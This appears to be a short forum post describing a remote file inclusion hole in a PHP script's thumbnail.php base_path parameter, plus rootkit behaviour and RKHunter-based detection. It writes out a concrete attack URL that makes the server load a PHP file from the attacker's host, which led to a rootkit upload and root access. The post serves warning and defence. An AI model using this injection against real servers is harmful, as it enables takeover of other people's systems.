I tested it local and used a php file that i got that has tons of tools to ftp files from and to the server etc all I had to do is say thumbnail.php?base_path=
http://www.myserver.tld/hackfile.php and it started that external php on my webserver and I could just upload a rootkit and got root acces on the server.
you could also use a php script that has a pice of shellcode that is included and that gives you shellacces as root also.
it was not hart at all to do. luckaly there are lots of script kiddies that do not realy know what they are dooing and just scan your machiene and try the exploit and maybe replace your index.php so that your site is defaced.
if they are more tech then they could use a rootkit and do a chroot on your server that way they replace key binaries with there own binaries like ls then when you use ls it will also open a telnet port and that way giving hackers acces to your server they can even replace your ps comand in a way that you can not see the service they started. to scan for rootkids on your server us
RKHunter (rootkidHunter) to see if all the binaries are still matching the md5 hash.
if not the best thing is to roll the sytem out again.
Dimmy